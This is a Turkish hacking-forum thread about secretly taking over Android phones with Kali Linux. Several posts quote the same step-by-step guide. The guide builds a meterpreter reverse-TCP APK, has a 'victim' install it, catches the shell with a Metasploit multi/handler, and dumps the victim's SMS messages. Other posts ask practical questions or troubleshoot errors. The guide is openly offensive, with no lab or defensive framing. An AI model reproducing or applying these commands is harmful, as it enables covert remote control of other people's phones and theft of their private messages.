Kali Linux Android Telefona Sızma

ordo

Yeni üye
7 Eki 2009
23
0
bir kaç sorum var öncelikle progamı veya apk yı kurbana yedirdik diyelim kurbanın internete baglı olması gereklimi? 2 ) gerekli ise aynı internetemi bağlı olmamız gerekli ? 3) menzili varmı mesafe?
 

cewl

Kıdemli Üye
3 Haz 2017
2,870
9
29
Merdekan
bir kaç sorum var öncelikle progamı veya apk yı kurbana yedirdik diyelim kurbanın internete baglı olması gereklimi? 2 ) gerekli ise aynı internetemi bağlı olmamız gerekli ? 3) menzili varmı mesafe?

Salam guzel kardesim internetin mesafesi yokdur evet kurbana ya fatratla yada msfvenom ile yaratlims apk dosyasini yediririk ayni internet hayir ip ocal olmali yani modemde port acik olmali
 

ANUBIS_sw

Yeni üye
8 Kas 2022
12
3
42
Türkiye
Hayırlı günler. Bu exploit denen kısmı anlamadım. nasıl bir program oluyor, karşı tarafa ne gönderiyoruz. Yada gönderdiğimiz programı nasıl yapıyoruz.
 

Redoks

Yeni üye
24 Ocak 2023
2
0
Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

rM4ypV.png


Adım 2 : msfconsole komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .

6PBMG3.png


Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;

> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

v5Gylp.png


Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

XkGljj.png


Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için help komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

RkAG4a.png


Adım 6 : Örnek olarak telefondaki SMSlere bakalım . Bunun için dump_sms komutunu kullanıyoruz.

v5GyDp.png


Adım 7 : Dosyamızı root klasörüne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

rM4yDz.png


Adım 8 : Ve SMSleri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .

WkzozE.png
Ben de sondaki meterpreter komut satırı çıkmıyor bunu nasıl halledebilirim
 

S M E R T

Yeni üye
11 Ocak 2023
6
1
Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

rM4ypV.png


Adım 2 : msfconsole komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .

6PBMG3.png


Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;

> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

v5Gylp.png


Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

XkGljj.png


Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için help komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

RkAG4a.png


Adım 6 : Örnek olarak telefondaki SMSlere bakalım . Bunun için dump_sms komutunu kullanıyoruz.

v5GyDp.png


Adım 7 : Dosyamızı root klasörüne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

rM4yDz.png


Adım 8 : Ve SMSleri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .

WkzozE.png
Selam. "Permission denided /root/Desktop/yazğm.isim" hatasə alıyorum izin verilmedi diyor ne yapa bilirim? 2016da olan form amma belki bakan olur
 

AwiR

Katılımcı Üye
4 Ocak 2020
503
211
Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

rM4ypV.png


Adım 2 : msfconsole komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .

6PBMG3.png


Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;

> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

v5Gylp.png


Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

XkGljj.png


Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için help komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

RkAG4a.png


Adım 6 : Örnek olarak telefondaki SMSlere bakalım . Bunun için dump_sms komutunu kullanıyoruz.

v5GyDp.png


Adım 7 : Dosyamızı root klasörüne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

rM4yDz.png


Adım 8 : Ve SMSleri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .

WkzozE.png
Eline Sağlık.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.